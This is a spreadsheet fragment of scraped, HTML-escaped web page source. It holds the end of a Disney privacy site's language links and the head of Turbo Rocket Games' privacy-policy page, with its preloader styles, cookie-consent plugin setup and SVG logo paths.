&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/fi/" hreflang="fi"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/fr/" hreflang="fr-FR"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/de/" hreflang="de"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/el/" hreflang="el"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/he/" hreflang="he"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/hi/" hreflang="hi"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/hu/" hreflang="hu"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/it/" hreflang="it"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/ja/" hreflang="ja"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/ko/" hreflang="ko"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/nn/" hreflang="nn"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/pl/" hreflang="pl"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/pt/" hreflang="pt-PT"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/ro/" hreflang="ro"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/ru/" hreflang="ru"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/sr/" hreflang="sr"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/es-es/" hreflang="es-ES"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/es/" hreflang="es-MX"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/sv/" hreflang="sv"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneyco</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;
&lt;html lang="en-US"&gt;
&lt;head&gt;
	&lt;meta charset="UTF-8"&gt;
	&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
	&lt;meta name="theme-color" content="#f98b22"&gt;
    &lt;meta name="msapplication-navbutton-color" content="#f98b22"&gt;
    &lt;meta name="apple-mobile-web-app-status-bar-style" content="#f98b22"&gt;
    &lt;style&gt;
    body {
        opacity: 0;
        -webkit-transition: opacity .3s linear;
        transition: opacity .3s linear;
    }
    @-webkit-keyframes puls {
        0% {
            -webkit-transform: translate(-50%,-50%) scale(1) rotate(0deg);
            transform: translate(-50%,-50%) scale(1) rotate(0deg)
        }
        50% {
            -webkit-transform: translate(-50%,-50%) scale(1.3) rotate(-16deg);
            transform: translate(-50%,-50%) scale(1.3) rotate(-16deg)
        }
        to {
            -webkit-transform: translate(-50%,-50%) scale(1) rotate(0deg);
            transform: translate(-50%,-50%) scale(1) rotate(0deg)
        }
    }
    @keyframes puls {
        0% {
            -webkit-transform: translate(-50%,-50%) scale(1) rotate(0deg);
            transform: translate(-50%,-50%) scale(1) rotate(0deg)
        }
        50% {
            -webkit-transform: translate(-50%,-50%) scale(1.3) rotate(-16deg);
            transform: translate(-50%,-50%) scale(1.3) rotate(-16deg)
        }
        to {
            -webkit-transform: translate(-50%,-50%) scale(1) rotate(0deg);
            transform: translate(-50%,-50%) scale(1) rotate(0deg)
        }
    }
    .preloader {
        background: #f1f2f6;
        visibility: visible;
        opacity: 1;
        position: fixed;
        z-index: 9999;
        height: 100%;
        width: 100%;
        top: 0;
        left: 0;
        right: 0;
        bottom: 0
    }
    .preloader.preloaded {
        opacity: 0;
        visibility: hidden;
        -webkit-transition: visibility 0s .5s,opacity .5s;
        transition: visibility 0s .5s,opacity .5s
    }
    .preload-indicator {
        overflow: visible;
        position: absolute;
        top: 50%;
        left: 50%;
        -webkit-transform-origin: 50% 50%;
        transform-origin: 50% 50%;
        -webkit-animation: puls 3s infinite;
        animation: puls 3s infinite
    }
    .preload-indicator-fallback {
        width: 42px;
        overflow: visible
    }
    .no-scroll {
        overflow: hidden;
    }
    &lt;/style&gt;
	&lt;title&gt;PRIVACY AND DATA PROTECTION POLICY &amp;#8211; Turbo Rocket Games&lt;/title&gt;
&lt;meta name="trp-slug" original="privacy-policy" content="privacy-policy" post-id="3"/&gt;
&lt;link rel='stylesheet' id='cookie-law-info-css'  href='https://turborocketgames.com/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/css/cookie-law-info-public.css?ver=2.3.5' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='cookie-law-info-gdpr-css'  href='https://turborocketgames.com/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/css/cookie-law-info-gdpr.css?ver=2.3.5' type='text/css' media='all' /&gt;
&lt;style id='cookie-law-info-gdpr-inline-css' type='text/css'&gt;
.cli-modal-content, .cli-tab-content { background-color: #ffffff; }.cli-privacy-content-text, .cli-modal .cli-modal-dialog, .cli-tab-container p, a.cli-privacy-readmore { color: #000000; }.cli-tab-header { background-color: #f2f2f2; }.cli-tab-header, .cli-tab-header a.cli-nav-link,span.cli-necessary-caption,.cli-switch .cli-slider:after { color: #000000; }.cli-switch .cli-slider:before { background-color: #ffffff; }.cli-switch input:checked + .cli-slider:before { background-color: #ffffff; }.cli-switch .cli-slider { background-color: #e3e1e8; }.cli-switch input:checked + .cli-slider { background-color: #28a745; }.cli-modal-close svg { fill: #000000; }.cli-tab-footer .wt-cli-privacy-accept-all-btn { background-color: #00acad; color: #ffffff}.cli-tab-footer .wt-cli-privacy-accept-btn { background-color: #00acad; color: #ffffff}.cli-tab-header a:before{ border-right: 1px solid #000000; border-bottom: 1px solid #000000; }
&lt;/style&gt;
&lt;link rel='stylesheet' id='trp-language-switcher-style-css'  href='https://turborocketgames.com/wp-content/plugins/translatepress-multilingual/assets/css/trp-language-switcher.css?ver=1.2.6' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='turbo-rocket-bundle-style-css'  href='https://turborocketgames.com/wp-content/themes/turborocketgames-website/build/css/styles.css?ver=1.2.0' type='text/css' media='all' /&gt;
&lt;script type='text/javascript' src='https://turborocketgames.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://turborocketgames.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'&gt;&lt;/script&gt;
&lt;script type='text/javascript'&gt;
/* &lt;! [CDATA[ */
var Cli_Data = {"nn_cookie_ids":["trp_language","__cfduid"],"non_necessary_cookies":{"necessary":["__cfduid","cookielawinfo-checkbox-advertisement"],"functional":["trp_language","SESSIONID","S"]},"cookielist":{"necessary":{"id":4,"status":true,"priority":0,"title":"Necessary","strict":true,"default_state":false,"ccpa_optout":false,"loadonstart":false},"functional":{"id":5,"status":true,"priority":5,"title":"Functional","strict":false,"default_state":false,"ccpa_optout":false,"loadonstart":false}},"ajax_url":"https:\/\/turborocketgames.com\/wp-admin\/admin-ajax.php","current_lang":"en","security":"f27cf36f26","eu_countries":["GB"],"geoIP":"disabled","use_custom_geolocation_api":"","custom_geolocation_api":"https:\/\/geoip.cookieyes.com\/geoip\/checker\/result.php","consentVersion":"11","strictlyEnabled":["necessary","obligatoire"],"cookieDomain":"","privacy_length":"250","ccpaEnabled":"1","ccpaRegionBased":"1","ccpaBarEnabled":"1","ccpaType":"ccpa_gdpr","triggerDomRefresh":"","secure_cookies":""};
var log_object = {"ajax_url":"https:\/\/turborocketgames.com\/wp-admin\/admin-ajax.php"};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' src='https://turborocketgames.com/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/js/cookie-law-info-public.js?ver=2.3.5'&gt;&lt;/script&gt;
&lt;script type='text/javascript'&gt;
/* &lt;!</t>
  </si>
  <si>
    <t>[CDATA[ */
var ccpa_data = {"opt_out_prompt":"Do you really wish to opt out?","opt_out_confirm":"Confirm","opt_out_cancel":"Cancel"};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' src='https://turborocketgames.com/wp-content/plugins/webtoffee-gdpr-cookie-consent/admin/modules/ccpa/assets/js/cookie-law-info-ccpa.js?ver=2.3.5'&gt;&lt;/script&gt;
&lt;link rel='https://api.w.org/' href='https://turborocketgames.com/wp-json/' /&gt;
&lt;link rel="canonical" href="https://turborocketgames.com/privacy-policy/" /&gt;
&lt;link rel='shortlink' href='https://turborocketgames.com/?p=3' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://turborocketgames.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fturborocketgames.com%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://turborocketgames.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fturborocketgames.com%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
&lt;link rel="alternate" hreflang="en-US" href="https://turborocketgames.com/privacy-policy/"/&gt;&lt;link rel="alternate" hreflang="ru-RU" href="https://turborocketgames.com/ru/privacy-policy/"/&gt;&lt;link rel="icon" href="https://turborocketgames.com/wp-content/uploads/2018/07/favicon-150x150.png" sizes="32x32" /&gt;
&lt;link rel="icon" href="https://turborocketgames.com/wp-content/uploads/2018/07/favicon-300x300.png" sizes="192x192" /&gt;
&lt;link rel="apple-touch-icon-precomposed" href="https://turborocketgames.com/wp-content/uploads/2018/07/favicon-300x300.png" /&gt;
&lt;meta name="msapplication-TileImage" content="https://turborocketgames.com/wp-content/uploads/2018/07/favicon-300x300.png" /&gt;
&lt;/head&gt;
&lt;body class="page-template-default page page-id-3 translatepress-en_US no-scroll news-page" &gt;
&lt;div class="preloader"&gt;
    &lt;svg class="preload-indicator" width="56px" height="61px" viewBox="0 0 36 41" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;
    &lt;path d="M17.0903301,13.66295 C16.8293798,14.9019839 15.7212061,15.1042043 15.1487766,15.1243568 L15.4824054,14.2960178 C15.5716961,14.0736449 15.9870017,13.0910348 15.8361073,13.0298822 L15.7025174,12.9749839 C15.4810211,12.8853398 14.6774048,13.7157636 14.5438148,13.9145093 C12.4472139,17.0395432 11.928082,20.4091873 11.928082,20.4091873 C11.8858592,20.8038992 11.9239289,21.0637975 12.1454252,21.1534415 L12.3357736,21.2305771 C12.5565777,21.3209161 12.7773818,21.0130687</t>
  </si>
  <si>
    <t>12.8666725,20.7906958 C14.4441415,17.3585093 16.7899258,18.3112382 16.7899258,18.3112382 C16.7899258,18.3112382 17.3305152,12.523289 17.0903301,13.66295" id="Fill-20" fill="#4F5763"&gt;&lt;/path&gt;
    &lt;path d="M24.2236878,16.5586619 C23.5536614,17.631611 24.2098442,18.5495941 24.6078454,18.9637636 L24.9414742,18.1354246 C25.0307649,17.9130517 25.4121538,16.9172382 25.5637404,16.9783907 L25.6973303,17.0325941 C25.9188266,17.1229331</t>
  </si>
  <si>
    <t>25.9215953,18.2806619 25.8800648,18.5162382 C25.223882,22.2263907</t>
  </si>
  <si>
    <t>23.2643319,25.011611 23.2643319,25.011611 C23.0213781,25.3243229 22.8137254,25.4848483 22.5929212,25.3945093 L22.4025728,25.3173737 C22.1810765,25.2277297 22.2357584,24.8524754 22.3257413,24.6301026 C23.567505,21.0624076 21.2210285,20.1096788 21.2210285,20.1096788 C21.2210285,20.1096788 24.8397243,15.5718822 24.2236878,16.5586619" id="Fill-22" fill="#5E6674"&gt;&lt;/path&gt;
    &lt;path d="M14.2625145,27.3976721 C14.0347887,27.3052483</t>
  </si>
  <si>
    <t>13.9247327,27.04535 14.0174843,26.8167229 L16.7508871,20.0280958 C16.8235655,19.8488076 17.0270653,19.7619432 17.2056466,19.8342144</t>
  </si>
  <si>
    <t>L17.3828437,19.9057907 C17.5614251,19.9787568 17.6479471,20.1830619 17.5759608,20.3630449 L14.8411736,27.1516721 C14.7498064,27.3796043 14.4902404,27.4900958 14.2625145,27.3976721" id="Fill-27" fill="#F2902A"&gt;&lt;/path&gt;
    &lt;path d="M16.429579,29.7386331 C16.2018531,29.6462093 16.0917971,29.386311 16.1838565,29.1576839 L19.4239321,21.1133449 C19.4959184,20.9333619 19.7001103,20.8464975 19.8786917,20.9194636 L20.0551966,20.9910398 C20.2344701,21.064006 20.3209921,21.268311 20.2483137,21.4475992 L17.0082381,29.4926331 C16.9161787,29.7205653 16.6573049,29.8310568 16.429579,29.7386331" id="Fill-29" fill="#F2902A"&gt;&lt;/path&gt;
    &lt;path d="M14.1388227,31.5654958 C13.9110968,31.4730721 13.8010408,31.2131737 13.8937924,30.9845466 L18.0876865,20.5705466 C18.1596727,20.3905636</t>
  </si>
  <si>
    <t>18.3638647,20.3043941 18.542446,20.3766653 L18.7189509,20.4482415 C18.8975323,20.5212076 18.9840543,20.7255127 18.912068,20.9054958 L14.7174818,31.3188009 C14.6261146,31.547428 14.3665486,31.6579195 14.1388227,31.5654958" id="Fill-31" fill="#F98B22"&gt;&lt;/path&gt;
    &lt;path d="M26.9217204,9.52903816 C27.5903623,5.66669917</t>
  </si>
  <si>
    <t>26.6787666,0.190072053 26.6787666,0.190072053 L26.6400048,0.283885613 L26.5998585,0.378394087 L26.6766901,0.189377138 C26.6766901,0.189377138 22.2294596,3.49091951 20.0366463,6.734089 C16.821489,11.4880043 16.2878213,18.1070721 16.2878213,18.1070721 L16.9959173,18.394767 C16.9190858,18.7665466 17.1135872,19.1515297 17.4762874,19.2988517 L18.7699643,19.8235127 L20.0636411,20.3488687 C20.4270335,20.4961907 20.8333408,20.3551229 21.0354561,20.034767 L21.7435521,20.321767 C21.7435521,20.321767 25.9415992,15.1905127</t>
  </si>
  <si>
    <t>26.9217204,9.52903816" id="Fill-24" fill="#5E6674"&gt;&lt;/path&gt;
    &lt;path d="M26.599997,0.378463579 L26.6761363,0.18944663 C26.6761363,0.18944663 22.2295981,3.490989 20.0367847,6.73415849</t>
  </si>
  <si>
    <t>C16.8216274,11.4880737 16.2879598,18.1071415 16.2879598,18.1071415 L16.9960558,18.3948365 C16.9192242,18.7666161 17.1137257,19.1515992 17.4764259,19.2989212 L18.7701027,19.8235822 L26.6401432,0.283955104 L26.599997,0.378463579 Z" id="Fill-33" fill="#4F5763"&gt;&lt;/path&gt;
    &lt;path d="M5.85735285,26.3356331 C6.25535401,27.2772432 6.03801077,28.3244805 5.39013408,29.0305144 C5.72445506,28.2612432 5.75767951,27.3620229 5.40536195,26.5281246 C5.0530444,25.6942263 4.38578679,25.0931246 3.60224362,24.7998704 C4.55883078,24.8228026 5.45935168,25.3940229 5.85735285,26.3356331 M1.57139941,20.1849382 C1.565862,20.1891076 1.56032459,20.1939721 1.55478718,20.1981415 C1.55617154,20.1898026 1.55755589,20.1821585 1.55894024,20.1731246 C1.56309329,20.1772941 1.56655417,20.1814636 1.57139941,20.1849382 M7.41890177,32.3883449</t>
  </si>
  <si>
    <t>C7.52618904,33.0040398 7.87366137,33.5759551 8.43293953,33.9477348 C8.99290987,34.3202093 9.65324572,34.4174975 10.2588997,34.2764297 C9.65601442,34.6565483 8.86347297,34.6739212 8.23151633,34.2534975 C7.59955969,33.8337687 7.30607709,33.0943788 7.41890177,32.3883449 M19.6053514,38.0963788 C20.3169083,37.5397517 20.7225234,36.7364297 20.8021236,35.9011415 C21.0270808,36.8351076 20.7100642,37.8566331 19.9071401,38.4855314 C19.104216,39.1144297 18.0403416,39.1741924 17.1931183,38.7280568 C18.0195763,38.8538365 18.8937946,38.6537009 19.6053514,38.0963788</t>
  </si>
  <si>
    <t>M23.7037252,33.4168195 C23.600591,33.7121585 23.5722118,34.0373788 23.6414293,34.3660737 C23.8428525,35.3201924 24.7765979,35.9296331 25.7269555,35.7267178 C26.1491828,35.6370737 26.5028847,35.4014975 26.7486072,35.0846161 C26.5520292,35.6474975</t>
  </si>
  <si>
    <t>26.0778887,36.0964127 25.4549303,36.2298365 C24.5045727,36.4320568 23.5708274,35.8226161 23.3694042,34.8684975 C23.2579639,34.3382771</t>
  </si>
  <si>
    <t>23.3957069,33.8136161 23.7037252,33.4168195 M28.1613383,8.51383646 C28.1225764,8.92453138 28.0713554,9.32897205 28.0049065,9.7181246 C27.9869099,9.81749748 27.9668368,9.91687036 27.9481481,10.0162432 C33.4613295,14.4268704 35.706056,22.1077687 32.9650393,29.001328 C32.75531,28.73865 32.4846692,28.5190568 32.1524247,28.3835483 C31.1162374,27.9631246</t>
  </si>
  <si>
    <t>29.9367695,28.4648534 29.5180031,29.5051415 C29.3941036,29.8122941 29.3594948,30.1298704</t>
  </si>
  <si>
    <t>29.3857975,30.4384127 C28.4679722,30.444667 27.6013679,30.9957348 27.2352068,31.9025992 C27.2269007,31.9255314 27.224132,31.9491585 27.2158259,31.9713958 C27.2061355,31.6642432</t>
  </si>
  <si>
    <t>27.2497425,31.3522263 27.3722577,31.0478534 C27.5051555,30.7184636 27.7086552,30.4404975 27.9523011,30.2139551 C27.7799493,29.2674805</t>
  </si>
  <si>
    <t>27.1466083,28.427328 26.1927899,28.0402602 C24.7115334,27.4391585 23.0253928,28.157006 22.4266606,29.6441246 C22.4259684,29.6448195 22.4259684,29.6455144 22.4259684,29.6455144 C22.7692877,29.6927687 23.1119148,29.7775483 23.4476201,29.9137517 C24.2173197,30.2264636 24.8444311,30.7407009 25.296422,31.3702941 C24.9496419,31.067311 24.5509485,30.8129721 24.1010342,30.6302093 C22.3789004,29.9311246</t>
  </si>
  <si>
    <t>20.4712635,30.4488365 19.3111766,31.7754297 C20.0351927,32.2764636 20.5370202,33.0172432 20.75644,33.8421076 C20.370898,33.101328 19.7327118,32.4877178 18.9000241,32.149989 C17.038763,31.3939212 14.9193203,32.2966161 14.166925,34.1659382 C13.8602911,34.9282602 13.8319119,35.7322771 14.0271055,36.4695822 C13.5501963,35.5536839 13.4595212,34.4425144 13.875519,33.4098704</t>
  </si>
  <si>
    <t>C13.8907468,33.3730398 13.9094356,33.3396839 13.9246635,33.3035483 C13.4373716,33.1868026 12.9438501,33.1784636 12.4697096,33.2597687 C12.4780157,33.241006 12.4877062,33.2236331 12.4953201,33.2048704 C13.0511374,31.8247687 12.3880329,30.2549551 11.0140636,29.6969382 C10.2983537,29.4064636 9.5328071,29.4502432 8.88285389,29.7518365 C8.86693385,29.72265 8.84824509,29.6941585 8.8309407,29.665667 C9.26701154,29.206328</t>
  </si>
  <si>
    <t>9.86228285,28.9332263 10.4935473,28.9290568 C10.6617461,28.7365653 10.8084874,28.5197517 10.9095451,28.2681924 C11.2729374,27.3654975 11.0369054,26.3703788 10.3897209,25.7248026 C9.75845646,26.2640568 8.91261746,26.5072771 8.07370021,26.3724636 C8.07439239,26.3564805 8.07508457,26.3404975 8.07577674,26.3252093 C9.0697414,26.1952602 9.96818577,25.5475992 10.3710322,24.548311 C10.9649191,23.072311 10.2554388,21.392006 8.78525708,20.7950737 C8.08062197,20.5087687 7.33030325,20.5268365 6.67342828,20.7818704 C6.98698398,21.4712263 7.03128324,22.2814975 6.72603365,23.0389551 C6.67827351,23.1584805 6.62082291,23.2710568 6.55852708,23.3801585 C6.54814444,23.3718195 6.5377618,23.3634805 6.52668698,23.3558365 C6.77794685,21.9792093 6.0975379,20.572006 4.82393416,19.931989 C4.32695184,20.5789551 3.46726931,20.8603958 2.66919045,20.5921585 C3.47419107,20.6310737 4.25150466,20.1703449 4.57059777,19.3781415 C4.97413634,18.3753788 4.49168971,17.2336331 3.49287982,16.8284975 C3.17724759,16.6999382 2.84984837,16.6700568 2.53421614,16.7075822 C5.26761894,9.94258222</t>
  </si>
  <si>
    <t>12.0004143,5.98851443 18.8931024,6.47356527 C18.9699339,6.35334493 19.0467654,6.2331246 19.1270578,6.11429409 C19.3277889,5.81756527</t>
  </si>
  <si>
    <t>19.548593,5.52222629 19.7790876,5.22827714 C12.0550962,4.32975171 4.3567154,8.64865002 1.30352732,16.2287856 C-2.35946777,25.3238365 2.03100423,35.7155992</t>
  </si>
  <si>
    <t>11.090203,39.3930907 C12.0087205,39.7655653 12.9410814,40.0511754 13.8775955,40.2617348 C14.0720969,40.3235822 14.2576001,40.3645822 14.4361815,40.3784805 C16.6919829,40.8086331 18.9657809,40.7808365 21.1447507,40.3479043</t>
  </si>
  <si>
    <t>C21.1509803,40.3465144 21.1565177,40.3451246 21.1627473,40.3444297 C26.8282074,39.2124127 31.8402534,35.3340907 34.1625037,29.5676839 C37.2696815,21.8513449 34.5798858,13.2045144 28.1613383,8.51383646" id="Fill-35" fill="#4F5763"&gt;&lt;/path&gt;
    &lt;/svg&gt;
&lt;/div&gt;
&lt;header id="header" class="header"&gt;
        &lt;nav class="header__menu"&gt;
            &lt;div class="container header__menu-wrapper"&gt;
                &lt;a href="https://turborocketgames.com" class="header__menu-logo"&gt;
                    &lt;svg version="1.1" class="desktop" width="205px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
                        viewBox="0 0 1080 211.5" xml:space="preserve"&gt;
                        &lt;g&gt;
                            &lt;polygon class="st0" points="0,63.6 24.7,63.6 24.7,128.2 42.2,128.2 42.2,63.6 66.9,63.6 66.9,49.8 0,49.8 	" /&gt;
                            &lt;path class="st0" d="M136.5,113h-30.2c-3.6,0-6.2-0.8-7.3-2.4c-1.2-2.2-1.8-4.7-1.6-7.3V49.8H79.8v56.7c0,2.8,0.5,5.5,1.4,8.2c0.8,2.6,2.1,4.9,3.8,6.9c1.8,2.1,4.1,3.7,6.7,4.8c3.1,1.2,6.5,1.8,9.9,1.7H127l9.5-11.7v11.7H154l0.1-78.3h-17.5V113H136.5z"/&gt;
                            &lt;path class="st0" d="M233.2,90.5c2.5-4.8,3.8-10.2,3.6-15.6c0-3.2-0.5-6.3-1.4-9.3c-0.9-2.9-2.4-5.7-4.3-8c-2-2.4-4.4-4.3-7.3-5.7c-3.2-1.5-6.8-2.2-10.3-2.1h-46.6v14.9h46.6c1.1,0,2.2,0.4,3.1,1.2c1,0.8,1.8,1.7,2.4,2.8s1.2,2.4,1.5,3.6c0.3,1,0.5,2.1,0.6,3.2c0,1.3-0.3,2.6-0.7,3.8c-0.5,1.4-1.1,2.8-2,4c-0.8,1.2-1.8,2.3-2.9,3.2c-1,0.8-2.3,1.2-3.6,1.3h-22.1l33.5,40.5h20.9l-22.4-29C226.5,98.1,230.7,94.9,233.2,90.5z" /&gt;
                            &lt;path class="st0" d="M314.1,87.3c2.1-2,3.9-4.4,5.2-7.1c1.4-2.8,2-5.8,2-8.9c0-2.9-0.5-5.9-1.7-8.6c-1.1-2.6-2.7-4.9-4.8-6.8c-2.1-1.9-4.6-3.4-7.3-4.4c-3.1-1.1-6.3-1.7-9.6-1.6h-49.8v78.3H298c3.5,0.1,7-0.6,10.2-2.1c2.8-1.3,5.3-3.3,7.3-5.7c2-2.3,3.5-5,4.4-7.9c1-3,1.5-6.1,1.5-9.3c0-3.1-0.8-6.1-2.2-8.9C318,91.7,316.2,89.3,314.1,87.3z M305.1,106.3c-0.3,1.2-0.8,2.3-1.5,3.3c-0.6,1-1.4,1.9-2.4,2.6c-0.9,0.7-2.1,1.1-3.2,1.1h-32.3V81.8l9.3,12h22.5c2.4,0.2,4.5,1.4,5.9,3.3c1.4,1.8,2.1,3.9,2.2,6.2C305.6,104.2,305.4,105.2,305.1,106.3z M303.6,76.8c-1.4,1.6-3.5,2.6-5.7,2.6h-32.2V64.9H298c2-0.1,4,0.5,5.6,1.9c1.3,1.2,2,2.8,2,4.6C305.6,73.3,304.9,75.3,303.6,76.8z" /&gt;
                            &lt;path class="st0" d="M412.5,72.6c-2.1-5.1-5.1-9.8-9-13.8c-8-8.1-19-12.6-30.4-12.5c-5.7,0-11.4,1.1-16.6,3.4c-5,2.2-9.6,5.3-13.5,9.2s-7,8.5-9.1,13.6c-2.2,5.3-3.3,11.1-3.2,16.9c0,0.4,0,0.8,0,1.2c0.4,23.1,19.4,41.6,42.6,41.2c5.8,0.1,11.5-1,16.8-3.2c5-2,9.6-5,13.5-8.9s6.9-8.5,9-13.6c2.2-5.3,3.3-11,3.3-16.7C415.7,83.7,414.6,77.9,412.5,72.6zM398,100.1c-1.4,3.1-3.3,5.9-5.8,8.3c-2.5,2.3-5.5,4.2-8.7,5.5c-3.3,1.3-6.9,2-10.5,2c-3.5,0-7-0.7-10.2-2.1c-3.2-1.3-6.1-3.3-8.6-5.7c-2.4-2.4-4.3-5.3-5.7-8.4c-1.4-3.2-2.2-6.7-2.1-10.2c0-3.5,0.7-7,2.1-10.3c1.4-3.2,3.3-6.2,5.7-8.7c2.4-2.5,5.3-4.6,8.5-6c3.3-1.5,6.8-2.2,10.4-2.2c3.7-0.1,7.5,0.7,10.9,2.2c3.2,1.4,6.1,3.4,8.5,6c2.4,2.5,4.3,5.4,5.7,8.7c1.3,3.3,2,6.8,2,10.3C400.2,93.1,399.5,96.7,398,100.1z" /&gt;
                        &lt;/g&gt;
                        &lt;g&gt;
                            &lt;path class="st0" d="M661.7,184.7h-25.1c-10.2,0-11.5-4.6-11.5-12.8s1.3-12.7,11.5-12.7h33.6v-8.7h-33.6c-15.4,0-20.7,7.1-20.7,21.4c0,14.3,5.3,21.6,20.7,21.6h34.1v-23.4l-9,0.1V184.7z" /&gt;
                            &lt;path class="st0" d="M738.4,149.9c-7.4,0-10.6,3.7-13.4,9.1l-17.5,34.5h9.8l5.5-10.6h31.7l5.4,10.6h9.7L751.8,159C749,153.6,745.8,149.9,738.4,149.9z M726.9,174.9l7.3-14.1c0.5-1.2,1.4-2.1,2.6-2.6c2.5-1,5.3,0.1,6.3,2.6l7.3,14.1H726.9z"/&gt;
                            &lt;path class="st0" d="M858.1,153.9l-17.9,21.8l-17.9-21.8c-1.3-2.1-3.6-3.3-6.1-3.3h-8.8v43h8.8v-33.5l20.5,24.6h6.9l20.4-24.6v33.4h8.8v-43h-8.7C861.8,150.6,859.5,151.8,858.1,153.9z" /&gt;
                            &lt;path class="st0" d="M913,172c0,14.2,5.3,21.5,20.7,21.5h34.1v-8.6h-34.1c-8.4,0-10.9-3.1-11.5-8.9H967v-8.1h-44.8c0.7-5.7,3.1-8.9,11.5-8.9h34.1v-8.5h-34.1C918.4,150.6,913,157.8,913,172z" /&gt;
                            &lt;path class="st0" d="M1044.5,168.4l-19.8-1.6c-7-0.6-8.7-1.3-8.7-4.2s2.4-4,6.6-4h35.8v-8.1h-34.9c-8.9,0-16.5,3.2-16.5,12.3c0,7.9,5.8,11.4,15.5,12.2l20.8,1.6c6.1,0.5,8.7,2.4,8.7,4.8s-1.7,4-7,4h-38.1v8h37.5c12.2,0,16.8-5.2,16.8-12.4C1061.1,172.4,1054.6,169.2,1044.5,168.4z" /&gt;
                        &lt;/g&gt;
                        &lt;g&gt;
                            &lt;g&gt;
                                &lt;path class="st0" d="M496.7,142.1L496.7,142.1c1.2,0.5,2.6-0.1,3-1.3l14.3-35.4l0,0c0.4-0.9-0.1-2-1-2.3l-0.9-0.4c-0.9-0.4-2,0.1-2.4,1l-14.3,35.4C495,140.2,495.5,141.6,496.7,142.1z" /&gt;
                                &lt;path class="st0" d="M527.1,108.6l-0.9-0.4c-0.9-0.4-2,0.1-2.4,1l-17,42c-0.5,1.2,0.1,2.5,1.3,3l0,0c1.2,0.5,2.5-0.1,3-1.3l17-42l0,0C528.5,110,528,109,527.1,108.6z" /&gt;
                                &lt;path class="st0" d="M521.1,108.1c0.4-0.9-0.1-2-1-2.3l-0.9-0.4c-0.9-0.4-2,0.1-2.4,1l-22,54.4c-0.5,1.2,0.1,2.6,1.3,3c0,0,0,0,0.1,0c1.2,0.4,2.5-0.2,2.9-1.3L521.1,108.1L521.1,108.1z" /&gt;
                            &lt;/g&gt;
                            &lt;path class="st1" d="M563.1,48.8c3.6-20.2-1.3-48.8-1.3-48.8v0.5L561.6,1l0.4-1c0,0-23.3,17.2-34.8,34.2c-16.9,24.8-19.7,59.4-19.7,59.4l3.6,1.5c-0.4,2,0.7,4,2.5,4.7l6.8,2.7l6.8,2.8c1.9,0.8,4,0.1,5.1-1.6l3.6,1.5C536,105.1,558,78.4,563.1,48.8z" /&gt;
                            &lt;path class="st2" d="M561.4,1l0.4-1c0,0-23.3,17.2-34.8,34.2c-16.9,24.8-19.7,59.4-19.7,59.4l3.6,1.5c-0.4,2,0.7,4,2.5,4.7l6.8,2.7l41.3-102L561.4,1z" /&gt;
                            &lt;path class="st1" d="M549,85.5c-2.5,4.1-1.6,9.4,2,12.6l1.7-4.4c0.5-1.1,2.5-6.3,3.3-6l0.7,0.3c1.1,0.5,1.2,6.5,0.9,7.7c-2.3,12.1-7,23.6-13.7,33.9c-1.3,1.6-2.4,2.5-3.6,2l-1-0.4c-1.2-0.5-0.9-2.4-0.4-3.6c6.5-18.6-5.8-23.6-5.8-23.6S552.2,80.3,549,85.5z" /&gt;
                            &lt;path class="st2" d="M511.6,70.4c-1.1,4.7-5.4,7.9-10.2,7.6l1.7-4.3c0.5-1.2,2.6-6.3,1.9-6.6l-0.7-0.3c-1.1-0.5-5.4,3.9-6.1,4.9c-6.8,10.3-11.4,21.8-13.7,33.9c-0.2,2.1,0,3.4,1.2,3.9l1,0.4c1.2,0.5,2.3-1.1,2.8-2.3c8.3-17.9,20.6-13,20.6-13S512.8,64.4,511.6,70.4z" /&gt;
                        &lt;/g&gt;
